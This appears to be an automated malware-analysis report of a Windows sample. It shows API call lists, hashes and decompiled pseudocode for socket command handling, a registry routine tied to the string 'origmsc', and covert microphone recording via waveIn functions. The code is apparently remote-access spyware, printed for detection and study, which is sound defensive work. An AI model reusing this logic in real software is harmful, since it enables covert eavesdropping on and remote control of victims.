                                        • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                        • malloc.MSVCRT ref: 00402175
                                        • recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                          • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                          • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                          • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                          • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,69D65DF0), ref: 00402302
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                        • String ID:
                                        • API String ID: 2200674315-0
                                        • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                        • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                        • time.MSVCRT ref: 004124E5
                                        • srand.MSVCRT ref: 004124F2
                                        • rand.MSVCRT ref: 00412506
                                        • rand.MSVCRT ref: 0041251A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        Strings
                                        • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                        • String ID: abcdefghijklmnopqrstuvwxyz
                                        • API String ID: 3357298394-1277644989
                                        • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                        • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                        • String ID: origmsc
                                        • API String ID: 643209241-68016026
                                        • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                        • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,69D8CB60,?,?,0041225E,?), ref: 00412919
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                        • String ID: ^"A
                                        • API String ID: 1083762089-1057680782
                                        • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                        • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 15%
                                        			E00411C4C(void* __eflags, intOrPtr _a4) {
                                        				char _v20;
                                        				void* _v36;
                                        				char _v52;
                                        				int _t21;
                                        				signed int _t35;
                                        				void* _t39;
                                        				void* _t45;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        				intOrPtr _t67;
                                        				void* _t69;
                                        				void* _t71;
                                        				void* _t72;
                                        				void* _t75;
                                        
                                        				_t75 = __eflags;
                                        				_t67 = _a4;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
                                        				_t21 = SetEvent( *(_t67 + 0x28));
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				_t71 = _t69;
                                        				_t45 = _t71;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t72 = _t71 + 0x24;
                                        				_t61 =  *_t21 - 0x61;
                                        				if(_t61 == 0) {
                                        					_push(E0040180C( &_v20, __eflags, 2));
                                        					_push(E0040180C( &_v20, __eflags, 1));
                                        					_push(E0040180C( &_v20, __eflags, 0));
                                        					_push(_t72 - 0x10);
                                        					E00411D8A(E00412881(_t29));
                                        				} else {
                                        					_t62 = _t61 - 0x3d;
                                        					if(_t62 == 0) {
                                        						E00411A24(_t45);
                                        					} else {
                                        						_t63 = _t62 - 4;
                                        						if(_t63 == 0) {
                                        							_t35 = E0040180C( &_v20, __eflags, 0);
                                        							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                        							__eflags =  *_t35;
                                        							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
                                        						} else {
                                        							_t64 = _t63 - 3;
                                        							if(_t64 == 0) {
                                        								_t39 =  *0x41c1d4;
                                        								__eflags = _t39;
                                        								if(_t39 != 0) {
                                        									SetEvent(_t39);
                                        								}
                                        							} else {
                                        								_t65 = _t64 - 1;
                                        								if(_t65 == 0) {
                                        									 *0x41c1d2 = 1;
                                        								} else {
                                        									if(_t65 == 1) {
                                        										 *0x41c1d3 = 1;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				E004017DD( &_v20);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        0x00411c4c
                                        0x00411c53
                                        0x00411c5e
                                        0x00411c6d
                                        0x00411c72
                                        0x00411c8a
                                        0x00411c9a
                                        0x00411ca0
                                        0x00411ca6
                                        0x00411ca9
                                        0x00411cb3
                                        0x00411cb8
                                        0x00411cbb
                                        0x00411cbe
                                        0x00411d3c
                                        0x00411d47
                                        0x00411d57
                                        0x00411d58
                                        0x00411d60
                                        0x00411cc0
                                        0x00411cc0
                                        0x00411cc3
                                        0x00411d2b
                                        0x00411cc5
                                        0x00411cc5
                                        0x00411cc8
                                        0x00411d03
                                        0x00411d0a
                                        0x00411d10
                                        0x00411d22
                                        0x00411cca
                                        0x00411cca
                                        0x00411ccd
                                        0x00411cee
                                        0x00411cf3
                                        0x00411cf5
                                        0x00411cf8
                                        0x00411cf8
                                        0x00411ccf
                                        0x00411ccf
                                        0x00411cd0
                                        0x00411ce5
                                        0x00411cd2
                                        0x00411cd3
                                        0x00411cd9
                                        0x00411cd9
                                        0x00411cd3
                                        0x00411cd0
                                        0x00411ccd
                                        0x00411cc8
                                        0x00411cc3
                                        0x00411d6b
                                        0x00411d73
                                        0x00411d7c
                                        0x00411d87

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                        • SetEvent.KERNEL32(?), ref: 00411C6D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00411C8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • SetEvent.KERNEL32(?), ref: 00411CF8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                        • String ID:
                                        • API String ID: 3236006214-0
                                        • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                        • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 47%
                                        			E00401519(WCHAR* __eax, void* __eflags) {
                                        				char* _t4;
                                        				signed int _t5;
                                        				CHAR* _t10;
                                        				signed int _t11;
                                        				signed int _t19;
                                        				signed int _t20;
                                        				intOrPtr* _t26;
                                        				void* _t27;
                                        
                                        				_t27 = __eflags;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				CreateDirectoryW(__eax, 0);
                                        				0x41b218->wFormatTag = 1;
                                        				 *0x41b21a = 1;
                                        				 *0x41b21c = 0x1f40;
                                        				 *0x41b226 = 8;
                                        				 *0x41b220 = 0x1f40;
                                        				 *0x41b224 = 1;
                                        				 *0x41b228 = 0;
                                        				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t5 = atoi(_t4);
                                        				_t19 =  *0x41b21c; // 0x0
                                        				 *_t26 = 0x30008;
                                        				_t20 = _t19 * _t5 * 0x3c;
                                        				 *0x41b1d0 = _t20;
                                        				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
                                        				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
                                        				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				0x41b1a0->lpData = _t10;
                                        				_t11 =  *0x41b1d8; // 0x0
                                        				 *0x41b1a4 = _t11;
                                        				 *0x41b1a8 = 0;
                                        				 *0x41b1ac = 0;
                                        				 *0x41b1b0 = 0;
                                        				 *0x41b1b4 = 0;
                                        				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                        				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                        				waveInStart( *0x41b210);
                                        				return 0;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                        • atoi.MSVCRT ref: 0040157F
                                        • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                        • waveInStart.WINMM ref: 00401633
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                        • String ID:
                                        • API String ID: 1097200658-0
                                        • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                        • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                        • SetEvent.KERNEL32(?), ref: 0040F16D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040F18E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
